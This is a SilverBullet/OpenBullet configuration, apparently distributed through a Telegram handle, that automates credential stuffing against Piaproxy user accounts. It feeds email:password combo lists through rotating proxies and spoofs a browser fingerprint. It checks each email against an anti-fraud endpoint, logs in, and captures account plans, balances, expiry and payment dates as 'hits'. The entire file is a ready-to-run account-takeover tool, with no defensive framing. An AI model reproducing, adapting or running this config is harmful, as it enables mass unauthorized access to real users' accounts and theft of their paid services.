[SETTINGS]
{
  "Name": "Piaproxy(SOCKS5)",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2025-08-22T16:16:24.2306887+04:00",
  "AdditionalInfo": "Telegram: 🔥 @therealyashvirgaming 🔥",
  "RequiredPlugins": [],
  "Author": "🔥 @therealyashvirgaming 🔥",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Default",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Piaproxy(SOCKS5)",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Constant "{\"Type\":\"\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36\",\"appName\":\"Netscape\",\"appVersion\":\"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36\",\"cookieEnabled\":true,\"cpuClass\":\"\",\"cpuInfo\":32,\"mimeType\":2,\"platform\":\"Win32\",\"totalMemory\":8,\"timezoneOffset\":-240,\"pluginslength\":5,\"userLanguage\":\"\",\"systemLanguage\":\"\",\"Director\":\"\",\"javaEnabled\":\"\",\"QuickTime\":\"\",\"ShockwaveFlash\":\"\",\"MediaPlayer\":\"\",\"RealPlayer\":\"\",\"windowheight\":1440,\"windowwidth\":2560,\"windowcolorDepth\":24,\"windowdeviceXDPI\":\"\",\"windowfontSmoothingEnabled\":\"\",\"appCodeName\":\"Mozilla\",\"appMinorVersion\":\"\",\"language\":\"en-US\",\"onLine\":true,\"opsProfile\":\"\",\"oscpu\":\"\",\"product\":\"Gecko\",\"productSub\":\"20030107\",\"securityPolicy\":\"\",\"userProfile\":\"\",\"vendor\":\"\",\"vendorSub\":\"\"}" -> VAR "yashvir" 

FUNCTION Base64Encode "<yashvir>" -> VAR "yashvirgaming" 

FUNCTION URLEncode "<USER>" -> VAR "US" 

#CHECK REQUEST POST "https://account.piaproxy.com/check_anti_fraud" 
  CONTENT "type=2&email=<US>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: account.piaproxy.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 
  HEADER "Accept: */*" 
  HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "DNT: 1" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Origin: https://www.piaproxy.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.piaproxy.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 35" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"data\":{\"email\":true," 
    KEY "\"msg_code\":\"ok\"}" 
  KEYCHAIN Failure OR 
    KEY "\"data\":{\"email\":false," 

#LOGIN REQUEST POST "https://account.piaproxy.com/user/login" 
  CONTENT "email=<USER>&password=<PASS>&t=%7B%7B.t%7D%7D&captcha=&request_id=<yashvirgaming>&request_p=V2lVuMzI%3D&code=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Host: account.piaproxy.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Origin: https://www.piaproxy.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.piaproxy.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 1255" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"code\":0," 
    KEY "\"s\":\"" 
  KEYCHAIN Failure OR 
    KEY "\"code\":-1," 
    KEY "Please enter the correct password！" 

PARSE "<SOURCE>" LR "\"s\":\"" "\"," -> VAR "s" 

FUNCTION URLEncode "<s>" -> VAR "stok" 

#USERINFO REQUEST POST "https://account.piaproxy.com/user/userinfo" 
  CONTENT "s=<stok>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: account.piaproxy.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "sec-ch-ua: \"Not;A=Brand\";v=\"99\", \"Google Chrome\";v=\"139\", \"Chromium\";v=\"139\"" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "DNT: 1" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Origin: https://www.piaproxy.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.piaproxy.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 102" 

#plans_name PARSE "<SOURCE>" LR "\"plans\":[{\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "plans_name" 

#data_center_balance PARSE "<SOURCE>" LR "\"data_center_balance\":" "," CreateEmpty=FALSE -> CAP "data_center_balance" 

#data_center_expire_time PARSE "<SOURCE>" LR "\"data_center_expire_time\":" "," CreateEmpty=FALSE -> CAP "data_center_expire_time" 

#flow_balance PARSE "<SOURCE>" LR "\"flow_balance\":" "," CreateEmpty=FALSE -> CAP "flow_balance" 

#pay_time PARSE "<SOURCE>" LR "\"pay_time\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "pay_time" 

#AUTHOR FUNCTION Constant "🔥 @therealyashvirgaming 🔥" -> CAP "Telegram: " 

